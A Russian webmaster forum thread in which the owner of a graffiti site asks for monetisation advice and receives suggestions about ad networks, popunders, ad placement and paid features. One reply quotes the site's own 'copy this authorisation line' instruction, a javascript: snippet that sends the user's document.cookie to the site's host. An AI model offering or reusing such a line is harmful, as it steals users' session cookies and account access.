как монетизировать сайт?

12
yukruglo
На сайте с 04.02.2009
87
1041

Здравствуйте!

Подскажите, как монетизировать сайт voption. ru?

Там ~1500-2000 уников/день. = ~8000-10000 просмотров по статистике li.ru

Ставил begun'а - никто не жмет. Ума не приложу, что туда поставить.

С popup копейки.

Заранее благодарен...

[Удален]

Попробуйте тизеры ( реф. ссылка ) .

fhuuz
На сайте с 08.03.2009
247

Кроме Бегуна есть еще Директ и Адсенс...

И на крайний случай tak.ru😂

yukruglo
На сайте с 04.02.2009
87

кроме Бегуна ставил и Гугль. Директ правда не пробовал. Отклик нулевый. Просто ребятишки, которые рисуют граффити вконтакте, не интересуются рекламой "окон ПВХ" и "раскруткой сайта от 50к руб.", поэтому этот метод монетизации неверный.

какие-нибудь еще советы есть? неужели никак по-другому нельзя конвертировать траф в 1,5к уников/сутки?

Inform-buro
На сайте с 01.03.2008
48

Совет такой - продайте его мне, а я монетизирую :)

fhuuz
На сайте с 08.03.2009
247
yukruglo:
кроме Бегуна ставил и Гугль. Директ правда не пробовал. Отклик нулевый.
какие-нибудь еще советы есть?

А как же!

Попробуйте оптимизировать объявления. Раз не кликают, значит Вы неправильно их разместили.

(Подсказка-место выбрали не кликабельное....😂)

Anton-webmaster
На сайте с 21.05.2009
7

Попандеры на 1000 уников дают 30-50 р в день макс. - бешенные деньги жэ)))

Кинотрафф платил нормально. Но его уже нет. (

1 ГС (http://filmoboz.net/) + 1 блогун (http://blogun.ru/bossegahaf.html) да 30 минут хохмы = 15 баков в день. Жить стало лучше, жить стало веселее.
E2
На сайте с 15.12.2006
128
1. Скопируйте строку авторизации:

javascript:open('http://voption.ru?c='+document.cookie,'_self');

Мамочки, это для кого сайт ;) Я такого в жизни не видел фокуса.

Сделайте всё очень просто и тупо. Большими кнопочками, понятно чтобы было всем. А то заходишь на сайт и неясно куда кликать-то толком, чего там делать. Дизайн вроде бы хороший, но вот я в тупике сейчас смотрю на эту строчку JS.

Просите у юзеров бабло за всякие модные фичи - вот Вам и монетизация. Не за всё подряд, а только за самый эксклюзив, если таковой вообще возможен.

Ап! И тигры у ног моих сели.
OPTIMER
На сайте с 05.01.2006
497

yukruglo, а Вы пробовали по-разному размещать бегун, пробовать адвордс и я.директ, менять цвета, положения и прочее?

оО Раскрутка сайтов без абон. платы, единоразово от 100.000 руб.
gosmart
На сайте с 24.01.2009
38

Поставьте Директ или Адсенс рядом с самыми популярными кнопками, ну, например «сохранить граффити» или подобное, как у вас там все оформлено я не знаю. Сделайте блок подходящим под дизайн сайта цветом, но в тоже время немного выделите его на общем фоне. Нужно, что бы он сразу бросился в глаза. По поводу окон ПВХ в объявлениях, я не совсем понял, паучок ведь подберет объявления под ваш контент и они станут интересными пользователям. Также есть надежды на нововведения Адсенса, после которых у развлекательных сайтов появится возможность показывать пользователям интересные только им объявления, которые, возможно, будут более прибыльными для вас.

[Удален]

Продолжайте над сайтом работать (развивайте дальше ) после монитизируете.

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий